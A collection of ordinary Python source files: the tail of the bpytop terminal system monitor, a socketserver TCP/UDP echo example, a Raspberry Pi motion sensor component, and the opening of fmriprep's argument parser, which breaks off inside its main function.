perc = f'{str(round((_i + 1) * 14 + 2)) + "%":>5}'
Draw.buffer("+banner", f'{Mv.to(Term.height // 2 - 2 + _i, Term.width // 2 - 28)}{Fx.trans(perc)}{Symbol.v_line}')
Draw.out("banner")
Draw.buffer("+init!", f'{Color.fg("#cc")}{Fx.b}{Mv.to(Term.height // 2 - 2, Term.width // 2 - 21)}{Mv.save}')
cls.initbg_data = [randint(0, 100) for _ in range(Term.width * 2)]
cls.initbg_up = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=True)
cls.initbg_down = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=False)
@classmethod
def success(cls):
if not CONFIG.show_init or cls.resized: return
cls.draw_bg(5)
Draw.buffer("+init!", f'{Mv.restore}{Symbol.ok}\n{Mv.r(Term.width // 2 - 22)}{Mv.save}')
@staticmethod
def fail(err):
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Symbol.fail}')
sleep(2)
errlog.exception(f'{err}')
clean_quit(1, errmsg=f'Error during init! See {CONFIG_DIR}/error.log for more information.')
@classmethod
def draw_bg(cls, times: int = 5):
for _ in range(times):
sleep(0.05)
x = randint(0, 100)
Draw.buffer("initbg", f'{Fx.ub}{Mv.to(0, 0)}{cls.initbg_up(x)}{Mv.to(Term.height // 2, 0)}{cls.initbg_down(x)}')
Draw.out("initbg", "banner", "init")
@classmethod
def done(cls):
cls.running = False
if not CONFIG.show_init: return
if cls.resized:
Draw.now(Term.clear)
else:
cls.draw_bg(10)
Draw.clear("initbg", "banner", "init", saved=True)
if cls.resized: return
del cls.initbg_up, cls.initbg_down, cls.initbg_data, cls.initbg_colors
#? Functions ------------------------------------------------------------------------------------->
def get_cpu_name() -> str:
'''Fetch a suitable CPU identifier from the CPU model name string'''
name: str = ""
nlist: List = []
command: str = ""
cmd_out: str = ""
rem_line: str = ""
if SYSTEM == "Linux":
command = "cat /proc/cpuinfo"
rem_line = "model name"
elif SYSTEM == "MacOS":
command ="sysctl -n machdep.cpu.brand_string"
elif SYSTEM == "BSD":
command ="sysctl hw.model"
rem_line = "hw.model"
try:
cmd_out = subprocess.check_output("LANG=C " + command, shell=True, universal_newlines=True)
except:
pass
if rem_line:
for line in cmd_out.split("\n"):
if rem_line in line:
name = re.sub( ".*" + rem_line + ".*:", "", line,1).lstrip()
else:
name = cmd_out
nlist = name.split(" ")
try:
if "Xeon" in name and "CPU" in name:
name = nlist[nlist.index("CPU")+(-1 if name.endswith(("CPU", "z")) else 1)]
elif "Ryzen" in name:
name = " ".join(nlist[nlist.index("Ryzen"):nlist.index("Ryzen")+3])
elif "Duo" in name and "@" in name:
name = " ".join(nlist[:nlist.index("@")])
elif "CPU" in name and not nlist[0] == "CPU" and not nlist[nlist.index("CPU")-1].isdigit():
name = nlist[nlist.index("CPU")-1]
except:
pass
name = name.replace("Processor", "").replace("CPU", "").replace("(R)", "").replace("(TM)", "").replace("Intel", "")
name = re.sub(r"\d?\.?\d+[mMgG][hH][zZ]", "", name)
name = " ".join(name.split())
return name
def get_cpu_core_mapping() -> List[int]:
mapping: List[int] = []
if SYSTEM == "Linux" and os.path.isfile("/proc/cpuinfo"):
try:
mapping = [0] * THREADS
num = 0
with open("/proc/cpuinfo", "r") as f:
for line in f:
if line.startswith("processor"):
num = int(line.strip()[(line.index(": ")+2):])
if num > THREADS - 1:
break
elif line.startswith("core id"):
mapping[num] = int(line.strip()[(line.index(": ")+2):])
if num < THREADS - 1:
raise Exception
except:
mapping = []
if not mapping:
mapping = []
for _ in range(THREADS // CORES):
mapping.extend([x for x in range(CORES)])
return mapping
def create_box(x: int = 0, y: int = 0, width: int = 0, height: int = 0, title: str = "", title2: str = "", line_color: Color = None, title_color: Color = None, fill: bool = True, box = None) -> str:
'''Create a box from a box object or by given arguments'''
out: str = f'{Term.fg}{Term.bg}'
if not line_color: line_color = THEME.div_line
if not title_color: title_color = THEME.title
#* Get values from box class if given
if box:
x = box.x
y = box.y
width = box.width
height =box.height
title = box.name
hlines: Tuple[int, int] = (y, y + height - 1)
out += f'{line_color}'
#* Draw all horizontal lines
for hpos in hlines:
out += f'{Mv.to(hpos, x)}{Symbol.h_line * (width - 1)}'
#* Draw all vertical lines and fill if enabled
for hpos in range(hlines[0]+1, hlines[1]):
out += f'{Mv.to(hpos, x)}{Symbol.v_line}{" " * (width-2) if fill else Mv.r(width-2)}{Symbol.v_line}'
#* Draw corners
out += f'{Mv.to(y, x)}{Symbol.left_up}\
{Mv.to(y, x + width - 1)}{Symbol.right_up}\
{Mv.to(y + height - 1, x)}{Symbol.left_down}\
{Mv.to(y + height - 1, x + width - 1)}{Symbol.right_down}'
#* Draw titles if enabled
if title:
out += f'{Mv.to(y, x + 2)}{Symbol.title_left}{title_color}{Fx.b}{title}{Fx.ub}{line_color}{Symbol.title_right}'
if title2:
out += f'{Mv.to(hlines[1], x + 2)}{Symbol.title_left}{title_color}{Fx.b}{title2}{Fx.ub}{line_color}{Symbol.title_right}'
return f'{out}{Term.fg}{Mv.to(y + 1, x + 1)}'
def now_sleeping(signum, frame):
"""Reset terminal settings and stop background input read before putting to sleep"""
Key.stop()
Collector.stop()
Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
Term.echo(True)
os.kill(os.getpid(), signal.SIGSTOP)
def now_awake(signum, frame):
"""Set terminal settings and restart background input read"""
Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
Term.echo(False)
Key.start()
Term.refresh()
Box.calc_sizes()
Box.draw_bg()
Collector.start()
def quit_sigint(signum, frame):
"""SIGINT redirection to clean_quit()"""
clean_quit()
def clean_quit(errcode: int = 0, errmsg: str = "", thread: bool = False):
"""Stop background input read, save current config and reset terminal settings before quitting"""
global THREAD_ERROR
if thread:
THREAD_ERROR = errcode
interrupt_main()
return
if THREAD_ERROR: errcode = THREAD_ERROR
Key.stop()
Collector.stop()
if not errcode: CONFIG.save_config()
Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
Term.echo(True)
if errcode == 0:
errlog.info(f'Exiting. Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
else:
errlog.warning(f'Exiting with errorcode ({errcode}). Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
if not errmsg: errmsg = f'Bpytop exited with errorcode ({errcode}). See {CONFIG_DIR}/error.log for more information!'
if errmsg: print(errmsg)
raise SystemExit(errcode)
def floating_humanizer(value: Union[float, int], bit: bool = False, per_second: bool = False, start: int = 0, short: bool = False) -> str:
'''Scales up in steps of 1024 to highest possible unit and returns string with unit suffixed
* bit=True or defaults to bytes
* start=int to set 1024 multiplier starting unit
* short=True always returns 0 decimals and shortens unit to 1 character
'''
out: str = ""
mult: int = 8 if bit else 1
selector: int = start
unit: Tuple[str, ...] = UNITS["bit"] if bit else UNITS["byte"]
if isinstance(value, float): value = round(value * 100 * mult)
elif value > 0: value *= 100 * mult
else: value = 0
while len(f'{value}') > 5 and value >= 102400:
value >>= 10
if value < 100:
out = f'{value}'
break
selector += 1
else:
if len(f'{value}') == 4 and selector > 0:
out = f'{value}'[:-2] + "." + f'{value}'[-2]
elif len(f'{value}') == 3 and selector > 0:
out = f'{value}'[:-2] + "." + f'{value}'[-2:]
elif len(f'{value}') >= 2:
out = f'{value}'[:-2]
else:
out = f'{value}'
if short:
if "." in out:
out = f'{round(float(out))}'
if len(out) > 3:
out = f'{int(out[0]) + 1}'
selector += 1
out += f'{"" if short else " "}{unit[selector][0] if short else unit[selector]}'
if per_second: out += "ps" if bit else "/s"
return out
def units_to_bytes(value: str) -> int:
if not value: return 0
out: int = 0
mult: int = 0
bit: bool = False
value_i: int = 0
units: Dict[str, int] = {"k" : 1, "m" : 2, "g" : 3}
try:
if value.lower().endswith("s"):
value = value[:-1]
if value.lower().endswith("bit"):
bit = True
value = value[:-3]
elif value.lower().endswith("byte"):
value = value[:-4]
if value[-1].lower() in units:
mult = units[value[-1].lower()]
value = value[:-1]
if "." in value and value.replace(".", "").isdigit():
if mult > 0:
value_i = round(float(value) * 1024)
mult -= 1
else:
value_i = round(float(value))
elif value.isdigit():
value_i = int(value)
if bit: value_i = round(value_i / 8)
out = int(value_i) << (10 * mult)
except ValueError:
out = 0
return out
def min_max(value: int, min_value: int=0, max_value: int=100) -> int:
return max(min_value, min(value, max_value))
def readfile(file: str, default: str = "") -> str:
out: Union[str, None] = None
if os.path.isfile(file):
try:
with open(file, "r") as f:
out = f.read().strip()
except:
pass
return default if out is None else out
def process_keys():
mouse_pos: Tuple[int, int] = (0, 0)
filtered: bool = False
global ARG_MODE
while Key.has_key():
key = Key.get()
if key in ["mouse_scroll_up", "mouse_scroll_down", "mouse_click"]:
mouse_pos = Key.get_mouse()
if mouse_pos[0] >= ProcBox.x and ProcBox.current_y + 1 <= mouse_pos[1] < ProcBox.current_y + ProcBox.current_h - 1:
pass
elif key == "mouse_click":
key = "mouse_unselect"
else:
key = "_null"
if ProcBox.filtering:
if key in ["enter", "mouse_click", "mouse_unselect"]:
ProcBox.filtering = False
Collector.collect(ProcCollector, redraw=True, only_draw=True)
continue
elif key in ["escape", "delete"]:
ProcCollector.search_filter = ""
ProcBox.filtering = False
elif len(key) == 1:
ProcCollector.search_filter += key
elif key == "backspace" and len(ProcCollector.search_filter) > 0:
ProcCollector.search_filter = ProcCollector.search_filter[:-1]
else:
continue
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
if filtered: Collector.collect_done.wait(0.1)
filtered = True
continue
if key == "_null":
continue
elif key == "q":
clean_quit()
elif key == "+" and CONFIG.update_ms + 100 <= 86399900:
CONFIG.update_ms += 100
Box.draw_update_ms()
elif key == "-" and CONFIG.update_ms - 100 >= 100:
CONFIG.update_ms -= 100
Box.draw_update_ms()
elif key in ["b", "n"]:
NetCollector.switch(key)
elif key in ["M", "escape"]:
Menu.main()
elif key in ["o", "f2"]:
Menu.options()
elif key in ["h", "f1"]:
Menu.help()
elif key == "z":
NetCollector.reset = not NetCollector.reset
Collector.collect(NetCollector, redraw=True)
elif key == "y":
CONFIG.net_sync = not CONFIG.net_sync
Collector.collect(NetCollector, redraw=True)
elif key == "a":
NetCollector.auto_min = not NetCollector.auto_min
NetCollector.net_min = {"download" : -1, "upload" : -1}
Collector.collect(NetCollector, redraw=True)
elif key in ["left", "right"]:
ProcCollector.sorting(key)
elif key == " " and CONFIG.proc_tree and ProcBox.selected > 0:
if ProcBox.selected_pid in ProcCollector.collapsed:
ProcCollector.collapsed[ProcBox.selected_pid] = not ProcCollector.collapsed[ProcBox.selected_pid]
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "e":
CONFIG.proc_tree = not CONFIG.proc_tree
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "r":
CONFIG.proc_reversed = not CONFIG.proc_reversed
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "c":
CONFIG.proc_per_core = not CONFIG.proc_per_core
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "g":
CONFIG.mem_graphs = not CONFIG.mem_graphs
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "s":
Collector.collect_idle.wait()
CONFIG.swap_disk = not CONFIG.swap_disk
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "f":
ProcBox.filtering = True
if not ProcCollector.search_filter: ProcBox.start = 0
Collector.collect(ProcCollector, redraw=True, only_draw=True)
elif key == "m":
if ARG_MODE:
ARG_MODE = ""
elif CONFIG.view_modes.index(CONFIG.view_mode) + 1 > len(CONFIG.view_modes) - 1:
CONFIG.view_mode = CONFIG.view_modes[0]
else:
CONFIG.view_mode = CONFIG.view_modes[(CONFIG.view_modes.index(CONFIG.view_mode) + 1)]
Box.proc_mode = CONFIG.view_mode == "proc"
Box.stat_mode = CONFIG.view_mode == "stat"
Draw.clear(saved=True)
Term.refresh(force=True)
elif key.lower() in ["t", "k", "i"] and (ProcBox.selected > 0 or ProcCollector.detailed):
pid: int = ProcBox.selected_pid if ProcBox.selected > 0 else ProcCollector.detailed_pid # type: ignore
if psutil.pid_exists(pid):
if key.lower() == "t": sig = signal.SIGTERM
elif key.lower() == "k": sig = signal.SIGKILL
elif key.lower() == "i": sig = signal.SIGINT
try:
os.kill(pid, sig)
except Exception as e:
errlog.error(f'Exception when sending signal {sig} to pid {pid}')
errlog.exception(f'{e}')
elif key == "delete" and ProcCollector.search_filter:
ProcCollector.search_filter = ""
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
elif key == "enter":
if ProcBox.selected > 0 and ProcCollector.detailed_pid != ProcBox.selected_pid and psutil.pid_exists(ProcBox.selected_pid):
ProcCollector.detailed = True
ProcBox.last_selection = ProcBox.selected
ProcBox.selected = 0
ProcCollector.detailed_pid = ProcBox.selected_pid
ProcBox.resized = True
elif ProcCollector.detailed:
ProcBox.selected = ProcBox.last_selection
ProcBox.last_selection = 0
ProcCollector.detailed = False
ProcCollector.detailed_pid = None
ProcBox.resized = True
else:
continue
ProcCollector.details = {}
ProcCollector.details_cpu = []
ProcCollector.details_mem = []
Graphs.detailed_cpu = NotImplemented
Graphs.detailed_mem = NotImplemented
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
elif key in ["up", "down", "mouse_scroll_up", "mouse_scroll_down", "page_up", "page_down", "home", "end", "mouse_click", "mouse_unselect"]:
ProcBox.selector(key, mouse_pos)
#? Pre main -------------------------------------------------------------------------------------->
CPU_NAME: str = get_cpu_name()
CORE_MAP: List[int] = get_cpu_core_mapping()
THEME: Theme
def main():
global THEME
Term.width = os.get_terminal_size().columns
Term.height = os.get_terminal_size().lines
#? Init -------------------------------------------------------------------------------------->
if DEBUG: TimeIt.start("Init")
#? Switch to alternate screen, clear screen, hide cursor, enable mouse reporting and disable input echo
Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
Term.echo(False)
Term.refresh(force=True)
#? Start a thread checking for updates while running init
if CONFIG.update_check: UpdateChecker.run()
#? Draw banner and init status
if CONFIG.show_init and not Init.resized:
Init.start()
#? Load theme
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Loading theme and creating colors... ")}{Mv.save}')
try:
THEME = Theme(CONFIG.color_theme)
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Setup boxes
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Doing some maths and drawing... ")}{Mv.save}')
try:
if CONFIG.check_temp: CpuCollector.get_sensors()
Box.calc_sizes()
Box.draw_bg(now=False)
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Setup signal handlers for SIGSTP, SIGCONT, SIGINT and SIGWINCH
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Setting up signal handlers... ")}{Mv.save}')
try:
signal.signal(signal.SIGTSTP, now_sleeping) #* Ctrl-Z
signal.signal(signal.SIGCONT, now_awake) #* Resume
signal.signal(signal.SIGINT, quit_sigint) #* Ctrl-C
signal.signal(signal.SIGWINCH, Term.refresh) #* Terminal resized
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Start a separate thread for reading keyboard input
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting input reader thread... ")}{Mv.save}')
try:
Key.start()
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Start a separate thread for data collection and drawing
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting data collection and drawer thread... ")}{Mv.save}')
try:
Collector.start()
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Collect data and draw to buffer
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Collecting data and drawing... ")}{Mv.save}')
try:
Collector.collect(draw_now=False)
pass
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Draw to screen
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Finishing up... ")}{Mv.save}')
try:
Collector.collect_done.wait()
except Exception as e:
Init.fail(e)
else:
Init.success()
Init.done()
Term.refresh()
Draw.out(clear=True)
if CONFIG.draw_clock:
Box.clock_on = True
if DEBUG: TimeIt.stop("Init")
#? Main loop ------------------------------------------------------------------------------------->
def run():
while not False:
Term.refresh()
Timer.stamp()
while Timer.not_zero():
if Key.input_wait(Timer.left()):
process_keys()
Collector.collect()
#? Start main loop
try:
run()
except Exception as e:
errlog.exception(f'{e}')
clean_quit(1)
else:
#? Quit cleanly even if false starts being true...
clean_quit()
if __name__ == "__main__":
main()
|
udpserverex2.py
|
import socketserver
from multiprocessing import Process, Pool
class MyTCPHandler(socketserver.BaseRequestHandler):
"""
The request handler class for our server.
It is instantiated once per connection to the server, and must
override the handle() method to implement communication to the
client.
"""
def handle(self):
# self.request is the TCP socket connected to the client
self.data = self.request.recv(1024).strip()
print("{} wrote:".format(self.client_address[0]))
print(self.data)
# just send back the same data, but upper-cased
self.request.sendall(self.data.upper())
class MyUDPHandler(socketserver.BaseRequestHandler):
"""
This class works similar to the TCP handler class, except that
self.request consists of a pair of data and client socket, and since
there is no connection the client address must be given explicitly
when sending data back via sendto().
"""
def handle(self):
data = self.request[0].strip()
socket = self.request[1]
print("{} wrote:".format(self.client_address[0]))
print(data)
socket.sendto(data.lower(), self.client_address)
def tcp_task():
server = socketserver.TCPServer(('0.0.0.0', 8888), MyTCPHandler)
try:
print('start tcp server')
server.serve_forever()
except Exception as e:
print(e)
def udp_task():
server = socketserver.UDPServer(('0.0.0.0', 8888), MyTCPHandler)
try:
server.serve_forever()
except Exception as e:
print(e)
if __name__ == "__main__":
HOST, PORT = "localhost", 8888
# p1 = Process(target=udp_task)
# p1.start()
# p1.join()
# p = Process(target=tcp_task)
# p.start()
# p.join()
# p = Pool(4)
# for i in range(4):
# p.apply_async(httpd_task)
# p.close()
# p.join()
# Create the server, binding to localhost on port 9999
with socketserver.UDPServer((HOST, PORT), MyUDPHandler) as server:
print('start udp server')
server.serve_forever()
# with socketserver.TCPServer((HOST, PORT), MyTCPHandler) as server1:
# server1.serve_forever()
|
motion_sensor_component.py
|
"""This module contains the MotionSensorComponent type."""
import threading
from datetime import datetime
from raspy.invalid_operation_exception import InvalidOperationException
from raspy.object_disposed_exception import ObjectDisposedException
from raspy.components.sensors.motion_sensor import MotionSensor
from raspy.components.sensors.motion_detected_event import MotionDetectedEvent
from raspy.io import pin_mode
from raspy.io import pin_state
from raspy.pi_system import core_utils
MOTION_DETECTED = pin_state.HIGH
"""The pin state to consider motion detected."""
class MotionSensorComponent(MotionSensor):
"""A component that is an abstraction of a motion sensor device."""
def __init__(self, pin):
"""Initialize a new instance of MotionSensorComponet.
:param raspy.io.gpio.Gpio pin: The input pin to check for motion on.
:raises: ArgumentNullException if pin is None.
"""
MotionSensor.__init__(self, pin)
self.__isPolling = False
self.__lastCheckDetected = False
self.__stopEvent = threading.Event()
self.__stopEvent.set()
self.__pollThread = None
@property
def is_polling(self):
"""Check to see if this instance is currently polling.
:returns: True if polling; Otherwise, False.
:rtype: bool
"""
return self.__isPolling
@property
def is_motion_detected(self):
"""Check to see if motion was detected.
:returns: True if motion was detected.
:rtype: bool
"""
return self.pin.state == MOTION_DETECTED
def interrupt_poll(self):
"""Interrupt the poll cycle."""
if not self.__isPolling or self.is_disposed:
return
if self.__stopEvent.is_set() or self.__pollThread is None:
return
self.__stopEvent.set()
self.__isPolling = False
def dispose(self):
"""Release managed resources used by this component."""
if self.is_disposed:
return
self.interrupt_poll()
MotionSensor.dispose(self)
def _execute_poll(self):
"""Execute the poll cycle."""
while not self.__stopEvent.is_set():
detected = self.is_motion_detected
if detected != self.__lastCheckDetected:
self.__lastCheckDetected = detected
now = datetime.now()
evt = MotionDetectedEvent(self.__lastCheckDetected, now)
self.on_motion_state_changed(evt)
core_utils.sleep(500)
def poll(self):
"""Poll the input pin status every 500ms until stopped.
:raises: raspy.object_disposed_exception.ObjectDisposedException if
this instance has been disposed.
:raises: raspy.invalid_operation_exception.InvalidOperationException
if the underlying pin is not an input pin.
"""
if self.is_disposed:
raise ObjectDisposedException("MotionSensorComponent")
if self.pin.mode != pin_mode.IN:
msg = "The specified pin is not configured as an input pin, which"
msg += " is required to read sensor data."
raise InvalidOperationException(msg)
self.__stopEvent.clear()
self.__isPolling = True
self.__pollThread = threading.Thread(target=self._execute_poll)
self.__pollThread.name = "MotionSensorComponentPollThread"
self.__pollThread.daemon = True
self.__pollThread.start()
|
run.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
fMRI preprocessing workflow
=====
"""
import os
import os.path as op
from pathlib import Path
import logging
import sys
import gc
import re
import uuid
import json
import tempfile
import psutil
import warnings
import subprocess
from argparse import ArgumentParser
from argparse import RawTextHelpFormatter
from multiprocessing import cpu_count
from time import strftime
from glob import glob
logging.addLevelName(25, 'IMPORTANT') # Add a new level between INFO and WARNING
logging.addLevelName(15, 'VERBOSE') # Add a new level between INFO and DEBUG
logger = logging.getLogger('cli')
def _warn_redirect(message, category, filename, lineno, file=None, line=None):
logger.warning('Captured warning (%s): %s', category, message)
def check_deps(workflow):
from nipype.utils.filemanip import which
return sorted(
(node.interface.__class__.__name__, node.interface._cmd)
for node in workflow._get_all_nodes()
if (hasattr(node.interface, '_cmd') and
which(node.interface._cmd.split()[0]) is None))
def get_parser():
"""Build parser object"""
from ..__about__ import __version__
verstr = 'fmriprep v{}'.format(__version__)
parser = ArgumentParser(description='FMRIPREP: fMRI PREProcessing workflows',
formatter_class=RawTextHelpFormatter)
# Arguments as specified by BIDS-Apps
# required, positional arguments
# IMPORTANT: they must go directly with the parser object
parser.add_argument('bids_dir', action='store',
help='the root folder of a BIDS valid dataset (sub-XXXXX folders should '
'be found at the top level in this folder).')
parser.add_argument('output_dir', action='store',
help='the output path for the outcomes of preprocessing and visual '
'reports')
parser.add_argument('analysis_level', choices=['participant'],
help='processing stage to be run, only "participant" in the case of '
'FMRIPREP (see BIDS-Apps specification).')
# optional arguments
parser.add_argument('--version', action='version', version=verstr)
g_bids = parser.add_argument_group('Options for filtering BIDS queries')
g_bids.add_argument('--skip_bids_validation', '--skip-bids-validation', action='store_true',
default=False,
help='assume the input dataset is BIDS compliant and skip the validation')
g_bids.add_argument('--participant_label', '--participant-label', action='store', nargs='+',
help='a space delimited list of participant identifiers or a single '
'identifier (the sub- prefix can be removed)')
# Re-enable when option is actually implemented
# g_bids.add_argument('-s', '--session-id', action='store', default='single_session',
# help='select a specific session to be processed')
# Re-enable when option is actually implemented
# g_bids.add_argument('-r', '--run-id', action='store', default='single_run',
# help='select a specific run to be processed')
g_bids.add_argument('-t', '--task-id', action='store',
help='select a specific task to be processed')
g_bids.add_argument('--echo-idx', action='store', type=int,
help='select a specific echo to be processed in a multiecho series')
g_perfm = parser.add_argument_group('Options to handle performance')
g_perfm.add_argument('--nthreads', '--n_cpus', '-n-cpus', action='store', type=int,
help='maximum number of threads across all processes')
g_perfm.add_argument('--omp-nthreads', action='store', type=int, default=0,
help='maximum number of threads per-process')
g_perfm.add_argument('--mem_mb', '--mem-mb', action='store', default=0, type=int,
help='upper bound memory limit for FMRIPREP processes')
g_perfm.add_argument('--low-mem', action='store_true',
help='attempt to reduce memory usage (will increase disk usage '
'in working directory)')
g_perfm.add_argument('--use-plugin', action='store', default=None,
help='nipype plugin configuration file')
g_perfm.add_argument('--anat-only', action='store_true',
help='run anatomical workflows only')
g_perfm.add_argument('--boilerplate', action='store_true',
help='generate boilerplate only')
g_perfm.add_argument('--ignore-aroma-denoising-errors', action='store_true',
default=False,
help='ignores the errors ICA_AROMA returns when there '
'are no components classified as either noise or '
'signal')
g_perfm.add_argument("-v", "--verbose", dest="verbose_count", action="count", default=0,
help="increases log verbosity for each occurence, debug level is -vvv")
g_perfm.add_argument('--debug', action='store_true', default=False,
help='DEPRECATED - Does not do what you want.')
g_conf = parser.add_argument_group('Workflow configuration')
g_conf.add_argument(
'--ignore', required=False, action='store', nargs="+", default=[],
choices=['fieldmaps', 'slicetiming', 'sbref'],
help='ignore selected aspects of the input dataset to disable corresponding '
'parts of the workflow (a space delimited list)')
g_conf.add_argument(
'--longitudinal', action='store_true',
help='treat dataset as longitudinal - may increase runtime')
g_conf.add_argument(
'--t2s-coreg', action='store_true',
help='If provided with multi-echo BOLD dataset, create T2*-map and perform '
'T2*-driven coregistration. When multi-echo data is provided and this '
'option is not enabled, standard EPI-T1 coregistration is performed '
'using the middle echo.')
g_conf.add_argument('--bold2t1w-dof', action='store', default=6, choices=[6, 9, 12], type=int,
help='Degrees of freedom when registering BOLD to T1w images. '
'6 degrees (rotation and translation) are used by default.')
g_conf.add_argument(
'--output-space', required=False, action='store',
choices=['T1w', 'template', 'fsnative', 'fsaverage', 'fsaverage6', 'fsaverage5'],
nargs='+', default=['template', 'fsaverage5'],
help='volume and surface spaces to resample functional series into\n'
' - T1w: subject anatomical volume\n'
' - template: normalization target specified by --template\n'
' - fsnative: individual subject surface\n'
' - fsaverage*: FreeSurfer average meshes\n'
'this argument can be single value or a space delimited list,\n'
'for example: --output-space T1w fsnative'
)
g_conf.add_argument(
'--force-bbr', action='store_true', dest='use_bbr', default=None,
help='Always use boundary-based registration (no goodness-of-fit checks)')
g_conf.add_argument(
'--force-no-bbr', action='store_false', dest='use_bbr', default=None,
help='Do not use boundary-based registration (no goodness-of-fit checks)')
g_conf.add_argument(
'--template', required=False, action='store',
choices=['MNI152NLin2009cAsym'], default='MNI152NLin2009cAsym',
help='volume template space (default: MNI152NLin2009cAsym)')
g_conf.add_argument(
'--output-grid-reference', required=False, action='store',
help='Deprecated after FMRIPREP 1.0.8. Please use --template-resampling-grid instead.')
g_conf.add_argument(
'--template-resampling-grid', required=False, action='store', default='native',
help='Keyword ("native", "1mm", or "2mm") or path to an existing file. '
'Allows to define a reference grid for the resampling of BOLD images in template '
'space. Keyword "native" will use the original BOLD grid as reference. '
'Keywords "1mm" and "2mm" will use the corresponding isotropic template '
'resolutions. If a path is given, the grid of that image will be used. '
'It determines the field of view and resolution of the output images, '
'but is not used in normalization.')
g_conf.add_argument(
'--medial-surface-nan', required=False, action='store_true', default=False,
help='Replace medial wall values with NaNs on functional GIFTI files. Only '
'performed for GIFTI files mapped to a freesurfer subject (fsaverage or fsnative).')
# ICA_AROMA options
g_aroma = parser.add_argument_group('Specific options for running ICA_AROMA')
g_aroma.add_argument('--use-aroma', action='store_true', default=False,
help='add ICA_AROMA to your preprocessing stream')
g_aroma.add_argument('--aroma-melodic-dimensionality', action='store',
default=-200, type=int,
help='Exact or maximum number of MELODIC components to estimate '
'(positive = exact, negative = maximum)')
# ANTs options
g_ants = parser.add_argument_group('Specific options for ANTs registrations')
g_ants.add_argument('--skull-strip-template', action='store', default='OASIS',
choices=['OASIS', 'NKI'],
help='select ANTs skull-stripping template (default: OASIS))')
g_ants.add_argument('--skull-strip-fixed-seed', action='store_true',
help='do not use a random seed for skull-stripping - will ensure '
'run-to-run replicability when used with --omp-nthreads 1')
# Fieldmap options
g_fmap = parser.add_argument_group('Specific options for handling fieldmaps')
g_fmap.add_argument('--fmap-bspline', action='store_true', default=False,
help='fit a B-Spline field using least-squares (experimental)')
g_fmap.add_argument('--fmap-no-demean', action='store_false', default=True,
help='do not remove median (within mask) from fieldmap')
# SyN-unwarp options
g_syn = parser.add_argument_group('Specific options for SyN distortion correction')
g_syn.add_argument('--use-syn-sdc', action='store_true', default=False,
help='EXPERIMENTAL: Use fieldmap-free distortion correction')
g_syn.add_argument('--force-syn', action='store_true', default=False,
help='EXPERIMENTAL/TEMPORARY: Use SyN correction in addition to '
'fieldmap correction, if available')
# FreeSurfer options
g_fs = parser.add_argument_group('Specific options for FreeSurfer preprocessing')
g_fs.add_argument(
'--fs-license-file', metavar='PATH', type=os.path.abspath,
help='Path to FreeSurfer license key file. Get it (for free) by registering'
' at https://surfer.nmr.mgh.harvard.edu/registration.html')
# Surface generation xor
g_surfs = parser.add_argument_group('Surface preprocessing options')
g_surfs.add_argument('--no-submm-recon', action='store_false', dest='hires',
help='disable sub-millimeter (hires) reconstruction')
g_surfs_xor = g_surfs.add_mutually_exclusive_group()
g_surfs_xor.add_argument('--cifti-output', action='store_true', default=False,
help='output BOLD files as CIFTI dtseries')
g_surfs_xor.add_argument('--fs-no-reconall', '--no-freesurfer',
action='store_false', dest='run_reconall',
help='disable FreeSurfer surface preprocessing.'
' Note : `--no-freesurfer` is deprecated and will be removed in 1.2.'
' Use `--fs-no-reconall` instead.')
g_other = parser.add_argument_group('Other options')
g_other.add_argument('-w', '--work-dir', action='store',
help='path where intermediate results should be stored')
g_other.add_argument(
'--resource-monitor', action='store_true', default=False,
help='enable Nipype\'s resource monitoring to keep track of memory and CPU usage')
g_other.add_argument(
'--reports-only', action='store_true', default=False,
help='only generate reports, don\'t run workflows. This will only rerun report '
'aggregation, not reportlet generation for specific nodes.')
g_other.add_argument(
'--run-uuid', action='store', default=None,
help='Specify UUID of previous run, to include error logs in report. '
'No effect without --reports-only.')
g_other.add_argument('--write-graph', action='store_true', default=False,
help='Write workflow graph.')
g_other.add_argument('--stop-on-first-crash', action='store_true', default=False,
help='Force stopping on first crash, even if a work directory'
' was specified.')
g_other.add_argument('--notrack', action='store_true', default=False,
help='Opt-out of sending tracking information of this run to '
'the FMRIPREP developers. This information helps to '
'improve FMRIPREP and provides an indicator of real '
'world usage crucial for obtaining funding.')
g_other.add_argument('--sloppy', action='store_true', default=False,
help='Use low-quality tools for speed - TESTING ONLY')
return parser
def main():
"""Entry point"""
from nipype import logging as nlogging
from multiprocessing import set_start_method, Process, Manager
